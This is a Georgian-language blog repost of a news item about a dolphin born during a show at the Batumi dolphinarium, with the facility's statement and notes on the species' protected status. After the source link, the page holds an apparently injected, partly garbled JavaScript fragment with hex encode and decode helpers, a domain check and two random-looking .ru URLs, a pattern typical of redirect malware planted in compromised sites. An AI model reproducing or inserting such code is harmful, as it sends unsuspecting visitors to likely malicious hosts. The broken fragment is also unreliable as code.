RSS

შოუს დროს დაბადებული დელფინი

07 Jun

delfinchikebi-cr-739x428ბათუმის დელფინარიუმში, შოუს მსვლელობისას, კიდევ ერთი დელფინი დაიბადა. ინფორმაციას და ფოტოს ამის შესახებ ფეისბუქის ოფიციალურ გვერდზე, დელფინარიუმის ადმინისტრაცია ავრცელებს.

ბათუმის დელფინარიუმისთვის ეს, რიგით მეოთხე შენაძენია. ახალშობილის დედა, დელფინი, მეტსახელად „მონიკაა“.

 

“დღევანდელი შოუს ვიზიტორები ჩვენი ისტორიის ერთ-ერთი ღირშესანიშნავი დღის მოწმენი გახდნენ. პატარისა და დედის უსაფრთხოების გამო შოუს თანმიმდევრობისა და სხვადასხვა ელემენტების შეცვლა მოგვიწია. გარემოსთან ადაპტაციას დედა პატარას პირველივე წუთებიდანვე ასწავლის. დაბადებისთანავე, ჰაერის პირველი ჩასუნთქვისათვის, დედამ შვილი წყლის ზედაპირზე ამოაცურა. მას შემდეგ კი ახალშობილი დედასთან ერთად სინქრონულად დაცურავს. რამდენიმე წუთის წინ ახალბედამ დედის რძით კვება დაიწყო. ეს პროცესი 1 წელზე მეტ ხანს გაგრძელდება”, – ნათქვამია, დელფინარიუმის მიერ გავრცელებულ განცხადებაში.

მათივე განმარტებით, მაქსიმალურად კომფორტული საარსებო გარემოს უზრუნველსაყოფად დელფინარიუმის თანამშრომლები ბოლო თვეებია (და ეს უახლოესი რამდენიმე კვირის მანძილზე გაგრძელდება) საგანგებო, 24 საათიან სპეც-რეჟიმში მუშაობენ.

“დედა-შვილის მყუდროების დარღვევის თავიდან აცილების გამო უმნიშვნელო ცვლილებები იქნება თავად პროგრამაში და შესაბამისად შოუს ქრონომეტრაჟშიც”, – განმარტავენ ადმინისტრაციაში.

ბუნებრივ პირობებთან მიახლოებულ საარსებო გარემოში დელფინის დაბადება არც თუ ისე ხშირია. თუმცა ბათუმის დელფინარიუმში მსგავსი შემთხვევაა უკვე მეოთხედ დაფიქსირდა.

“ეს ფაქტი კი იმის ნათელი დადასტურებაა, რომ დელფინარიუმის ბინადრები, მოვლისა და შენახვის თვალსაზრისით იდეალურ გარემოში იმყოფებიან, ყველა პრევენციული ზომების გათვალისწინებით, კვალიფიციური სპეციალისტების მეთვალყურეობის ქვეშ”, – ნათქვამია დელფინარიუმის განცხადებაში.

დელფინი აფალინა დელფინისებრთა ოჯახის ზღვის ძუძუმწოვარი ცხოველია. შეტანილია ბუნების დაცვის მსოფლიო კავშირის „წითელ ნუსხაში“(IUCN) და გადაშენების საფრთხის წინაშე მყოფი სახეობებით საერთაშორისო ვაჭრობის შესახებ კონვენციის (CITES) II დანართში.

 

http://www.ipress.ge/new/34701-shous-dros-dabadebuli-akhalshobili-delfini-dedastan-ertad-ukve-sinqronulad-curavs

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s